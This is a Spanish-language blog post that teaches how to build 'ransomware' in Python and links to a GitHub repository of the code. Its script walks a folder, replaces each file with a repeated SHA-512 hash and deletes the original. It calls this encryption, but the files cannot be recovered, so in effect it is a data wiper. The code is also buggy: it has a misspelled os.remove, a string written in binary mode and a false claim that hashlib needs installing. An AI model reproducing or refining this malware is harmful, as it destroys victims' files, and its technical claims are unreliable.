Creando un Ransomware en Python -Sha512-



    En este post vengo con algo que de seguro a muchos les gustara, hablo de crear nuestro propio ransomware en python y poder entender como funciona. Este tipo de ataque esta muy de moda en estos tiempos y es por eso que decidí hacer este post.

Antes de comenzar debo decir que este ramoneare funciona tanto para Windows al igual que para linux y mac. En mi caso lo haré para linux, en caso de que lo quieran correr en win solo deben instalar la librería hashlib y cambiar algunos valores en el código. 

Primero importamos las siguientes librerías y crear una variable con la ruta que deseamos cifrar.

import hashlib
import os

path = '/root/Desktop/test'


Luego creamos un for para listar todos los archivos que se encuentran en esa ruta, y luego leerlos uno a uno.

for archivos in os.listdir(path):
    os.chdir(path)
    with open(archivos, 'rb') as r:
        files = r.read()
        encrypt = hashlib.sha512(files).hexdigest()
        new_file = '(Archivo-cifrado)'+os.path.basename(archivos)

Hasta ahora lo que hicimos fue leer todos los archivos de esa ruta, luego en la variable encrypt declaramos el tipo de hash que utilizaremos para cifrar los archivos leídos los cuales se encuentran en files. Luego se crea un nuevo file con el hash de ese archivo y con el nombre "archivo-cifrado" mas el nombre de el archivo(el archivo el cual le pertenece ese has).

Por ultimo escribimos el hash en el nuevo archivo.

        with open(new_file, 'wb') as n:
            n.write(encrypt*0xFF)
            n.close()
            n.close()
            os.romove(archivos)

Listo una vez escrito el hash en el archivo borramos el original y solo quedara el archivo cifrado. Una vez ejecutemos el script cifrara todos los archivos en esa ruta ya sean .txt, videos o cualquier otro tipo de archivo. Si tenemos un folder en esa ruta nos dará un error pero podemos cambiar eso editando el código. Para mi próximo post puede que explique como solucionarlo.



Espero que les haya sido de ayuda y no olviden compartir y suscribirse.


código completo en Github.

https://github.com/Sh4rk0-666/Ramsonware-DarkShark











No hay comentarios.